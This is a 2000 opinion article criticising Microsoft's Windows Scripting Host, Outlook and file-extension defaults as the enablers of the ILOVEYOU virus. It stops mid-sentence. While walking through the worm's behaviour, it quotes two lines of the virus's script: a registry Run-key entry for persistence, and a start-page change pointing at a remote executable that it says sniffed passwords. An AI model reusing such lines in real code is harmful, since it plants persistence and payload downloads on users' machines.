Love, Microsoft

articles
May 9 2000 9:00 PM

Love, Microsoft

Who's to blame for the "ILOVEYOU" virus? Who else??

See below for Microsoft's response.

Here's some instant mythology surrounding the "ILOVEYOU" virus:

Advertisement

It attacked computers.

Any technology can be used for good or for evil.

It was spread by careless, ill-educated (and love-starved!) consumers, who clicked where they shouldn't have.

In reality, of course, the virus attacked and exploited software, not the computers themselves. That may seem like a pedantic distinction, and it's true that these days the line between hardware and software can be fuzzy. But computers themselves can have bugs, and they can have security holes, and that wasn't the case with the "love bug." In fact, the virus targeted the Microsoft Windows Scripting Host, Microsoft's Outlook mail program, Microsoft Internet Explorer, the Microsoft Windows Address Book, and the Microsoft Windows registry. It propagated by means of security flaws created by Microsoft software engineers. No one running MacOS or Unix could have spread this virus or any virus like it.

Microsoft's public comment has run: "There's always the potential for misuse. More important than the technical side of this is the human side. It's not something technology is ever going to be able to solve." It's a cliché that technology is value-neutral—a cliché employed in the service of a variety of causes. There's always some truth to the idea. Nuclear fission is just what it is, a piece of physics. Guns don't kill people, people kill people. But we're allowed to notice when particular technologies are especially dangerous. Some technologies actively invite misuse.

So here's what the ILOVEYOU virus did, and here's why it shouldn't have been able to:

  • It looked up some settings in the registry, Windows' core database of system settings, and then it changed those settings. For example, by default, scripts are given only 10 seconds to do whatever they do. So this script began by looking up this "timeout" feature and turning it off. Oops! Scripts shouldn't be allowed to override settings that control those same scripts.
  • Then it changed some more registry settings, with statements like regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs," which instructs the system to run a new script every time it starts up. Scripts shouldn't be allowed to alter anything in the registry—not without direct approval from a system administrator and especially not from inside an e-mail message. Microsoft knows this, in principle: Look here, for example. But it chose to leave the door open.
  • Then the script changed the start page of the (Microsoft) Web browser. In fact, it pointed the browser not at a Web site but at an executable file: regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertn MTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe." No! Don't go there. (Sure enough, the function of this program was to sniff for passwords.) It would be safer to require user intervention before changing the browser's start page. But Microsoft wanted to make it easy for companies like, oh, Microsoft, to change your start page for you.
  • In a subroutine cunningly titled "sub infectfiles," the virus copied itself—a nice, compact little script, after all—to files all over the user's hard disk, deleting some files and sneakily renaming others. Now, this is suspicious and dangerous behavior. An operating system has to support the deletion and renaming and alteration of files, but it doesn't have to give this capability to scripts—little programs run from inside e-mail messages or through the Web browser. These powerful abilities came with the Windows Scripting Host, not a part of Windows 95, but added to later systems, including any that got Internet Explorer Version 5. (Maybe the ILOVEYOU author read Microsoft TechNet's article on "Leveraging the Power of the Windows Scripting Host." "The script we've demonstrated may be the foundation for a greater task," it concludes cheerfully. "Once you've located a file, you may wish to perform a file copy or an FTP process.")
  • Finally, as we all now know, the virus performed a mass mailing of itself to everyone in the user's Outlook address book. Cute, and sometimes Microsoft customers do need to send mass mailings, but they don't need to be able to do it with scripts running from inside e-mail messages. Not ever. Close that door.

In recent years, Microsoft's designers have deliberately blurred the distinction between opening some data and running a program. To run Word, you no longer have to find the program and execute it. You can run Word indirectly, just by clicking on any Word document, identified by its filename, ending with the three-letter extension .doc. In the same way, if you click on a music file in the .mp3 format, you will execute a music player—by default, of course, Microsoft's own Media Player. The virus executed the Windows Scripting Host because it ended with the extension .vbs.

Which leads to one more lovely detail. Most of us rarely see those file extensions because the operating system hides them by default. That's another user-friendly feature: Instead of "Letter to Bill.doc," we see just "Letter to Bill." Speaking personally, I like this feature. I know that some security experts advise users to turn the feature off, but so far I've been willing to accept Microsoft's default setting and leave the extensions hidden. The ILOVEYOU virus exploited this by adding an extra fake extension to its name: "LOVE-LETTER-FOR-YOU.TXT.vbs." We users saw only the innocent-looking "LOVE-LETTER-FOR-YOU.TXT." The final, hidden, .vbs was the trigger.

Thus Windows gave us the worst of both worlds: It was smart enough to display and yet disregard the ".TXT" that would have started a harmless text editor. It was smart enough to conceal and yet execute the ".vbs." Microsoft should have been smart enough to take an obvious precaution in the first place: Prevent the creation of file names with double extensions. That kind of file name is a sure tip-off that someone is up to no good.

 Even after the fact, Microsoft continues to take a "Close the Barn Door" approach to security. It recommends with a straight face that users now delete all e-mail messages with the subject "ILOVEYOU." And the Microsoft Web site stresses (here):